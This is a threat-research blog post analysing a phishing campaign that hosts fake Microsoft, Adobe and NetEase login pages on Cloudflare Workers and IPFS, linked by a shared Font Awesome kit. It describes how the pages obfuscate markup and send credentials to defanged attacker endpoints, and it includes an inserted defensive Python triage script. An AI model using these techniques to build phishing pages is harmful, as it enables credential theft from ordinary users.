One Font, Countless Frauds: Exposing Large-Scale Phishing Activity Abusing Cloudflare
Published on
Nov 7, 2024
Introduction
At Hunt, we seek to move beyond open directories and malware C2 frameworks. Our research team actively seeks out emerging threats using innovative tools like our experimental phishing crawler. Our commitment to ensuring our users and the broader security community are aware of ongoing threats led us to identify a widespread phishing campaign leveraging Cloudflare services.
What tipped us off? A shared Font Awesome kit across a massive number of websites hosting fake login pages. This discovery led us to over 60,000 links, most targeting login credentials for Microsoft's SharePoint and Office365 platforms. The campaign wasn't limited to Microsoft products; we've also encountered pages imitating DHL, Webmail Panels, and Mercari, to name a few.
In this post, we'll share some of the details of this interesting set of URLs in hopes it will help identify this threat before it hits your inbox.
What is Font Awesome?
Font Awesome is a popular library that easily integrates icons and fonts into web pages. Threat actors may find this toolkit (with over 30,000 items to choose from) valuable in tailoring the look of their phishing pages to create a sense of normalcy and trust for the user, making them less likely to suspect the phishing attempt.
In this case, the particular Font Awesome kit used across the cluster of phishing domains is at https://kit[.]fontawesome[.]/585b051251.js.
The script's primary purpose is to manage the kit's configuration and loading of Font Awesome icons. It includes automatic SVG fetching (which requires a license), conflict detection, handling dynamic content changes, and ensuring icons are obtained from the correct location.
Phishing Activity Details
As all the phishing domains we found are hosted on Cloudflare, it's only fitting that they use their services. In this activity set, the scammers used either Cloudflare IPFS Gateways, distributing content from a decentralized network, or Cloudflare Workers, a serverless execution environment, to mask their malicious intent. *A handful do not use either service.
Below is a quick explanation of how threat actors can abuse these services:
- IPFS Gateways: Phishing actors can exploit IPFS gateways to host phishing content in a decentralized manner, making it potentially more challenging to track down and take down.
- Cloudflare Workers: While a legitimate service, malicious actors can misuse Cloudflare Workers to host phishing content or other malicious scripts, potentially making them appear to originate from a trusted source (Cloudflare).
We won't attempt to analyze all 60,000+ URLs in this post. Let's dive into a few examples to understand better how these phishing actors operate.
ogukbm[.]nmbzts2qjn2150[.]workers[.]dev
The first link we will cover is hosted via CF Workers. It pretends to be an Adobe document, requiring users to enter their email credentials. The source code of the page is obfuscated by HTML character encoding. However, we can get around this by inspecting the page using the Web Developer tools.
The arrow near the top of the page highlights the Font Awesome 585b051251 script, and the second arrow shows JavaScript code buried at the bottom of the page. This code appears to deal with login functionality. Let's take a closer look.
Below is a brief breakdown of the code in Figure 4:
- The code checks for a value in the URL hash and uses it to pre-fill the email field (#email) if it exists.
- Upon submission of the form, the code prevents the default form submission behavior, retrieves the values from the email and password fields, and then clears the password field.
- An error message indicates login failure, incrementing the counter (count) variable to track login attempts.
- After two failed attempts, the page redirects the user to the official Adobe website (line 24).
- Next, the code uses regex to validate that the information entered in the email field matches the basic structure of an email address.
- Finally, if the count variable is less than 2, the code extracts the email and password and sends an AJAX request to https://ugiuk[.]dyndns[.]dk/sign4/Adobe.php.
*At the time of writing, the URL accepting the credentials is no longer responding.
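A defender-side triage of crawled pages for the traits described above, as an added example that is not code from the original post or from Hunt's crawler: it undoes HTML character encoding before looking for the shared kit ID, a password field, and off-site PHP endpoints. The function names, the `cloudflare-ipfs.com` gateway hostname, and the sample page with its placeholder hosts are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# Kit ID from the post; the host part is matched loosely on purpose.
KIT_RE = re.compile(r"fontawesome\.[a-z.]+/585b051251\.js", re.I)
PASSWORD_RE = re.compile(r"<input[^>]+type\s*=\s*[\"']?password", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
IPFS_HOSTS = {"cloudflare-ipfs.com"}  # assumption: gateway hostname to watch

def decode_layers(markup, max_rounds=5):
    """Undo stacked HTML-entity / percent encoding until the text is stable."""
    for _ in range(max_rounds):
        decoded = unquote(html.unescape(markup))
        if decoded == markup:
            break
        markup = decoded
    return markup

def hosting(url):
    """Classify the hosting style the post describes from the page URL."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host.endswith(".workers.dev"):
        return "cloudflare-workers"
    if host in IPFS_HOSTS or parts.path.startswith("/ipfs/"):
        return "ipfs-gateway"
    return "other"

def triage(url, markup):
    """Return the indicators found in one crawled page."""
    text = decode_layers(markup)
    page_host = (urlsplit(url).hostname or "").lower()
    offsite = sorted({u for u in URL_RE.findall(text)
                      if urlsplit(u).path.lower().endswith(".php")
                      and (urlsplit(u).hostname or "").lower() != page_host})
    kit, pw = bool(KIT_RE.search(text)), bool(PASSWORD_RE.search(text))
    return {"hosting": hosting(url), "kit": kit, "password_field": pw,
            "kit_visible_in_raw": bool(KIT_RE.search(markup)),
            "offsite_php": offsite, "suspicious": kit and pw}

# Constructed sample: placeholder hosts, every character entity-encoded.
SAMPLE_URL = "https://constructed.example-account.workers.dev/"
SAMPLE_PLAIN = (
    '<script src="https://kit.fontawesome.com/585b051251.js"></script>'
    '<form><input id="email"><input type="password" id="password"></form>'
    '<script>$.ajax({type:"POST",url:"https://collector.example/gate.php"})</script>')
SAMPLE_RAW = "".join(f"&#{ord(c)};" for c in SAMPLE_PLAIN)
```

Calling `triage(SAMPLE_URL, SAMPLE_RAW)` reports the kit as absent from the raw markup but present after decoding, which is the case a plain string match on crawled source would miss.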
weston1.html
Our second example leverages an IPFS gateway and a seemingly innocuous HTML page ('weston1.html') consisting of a Microsoft Word document to target Office365 credentials. The page also offers a "Sign in with Other Mail" option, suggesting a wider net for potential victims.
Again, in Figure 5, the arrows identify the Font Awesome script and a slightly more complex script buried at the bottom of the page.
The above image only includes the portion of code used to send the credentials to what is likely an actor-controlled server. The actual script was a few hundred lines; I'll provide a quick overview:
- The script initializes a dialog box/popup window containing an embedded login image for Gmail, Outlook, AOL, Office365, Yahoo, and 'Other'.
- Like the first script, the code validates the email address input into the email field and sends the credentials to https://usefuxoil[.]shop/high/boloadobe.php.
- The code redirects the user to a URL using the domain extracted from the user's email, even if the login was unsuccessful.
biocareremedies[.]in/admin/em/mnx/
Our third and final example is an oddity among the large group of URLs identified. In the URL above, we see a domain likely spoofing some type of healthcare organization but also using India's top-level domain (TLD). The domain isn't uncommon, but the phishing page contains the title "NetEast Enterprise Email -- Login Portal," with a login field over presumably the target's LinkedIn page.
The login field reads, "Email login timeout, please login again." NetEase is a large free e-mail provider within China, and the page uses a similar favicon often seen on 163[.]com webpages.
A significant difference between the code in Figure 8 and the others we've looked at is that the attacker has decided not to send the credentials to additional infrastructure but to a PHP page. At the beginning of the script, a base64-encoded string (bmV4dC5waHa=), which decodes to 'next.php,' is initialized.
We can easily navigate to this page in the browser.
Conclusion
The continued rise of IPFS phishing highlights the need for security solutions that can adapt and learn. Anomaly detection tools that analyze traffic patterns and identify deviations from normal behavior offer a powerful approach to uncovering novel threats.
Sign up for Hunt today and be among the first to know when our crawler goes live. We will continue to inform the community as new phishing threats appear.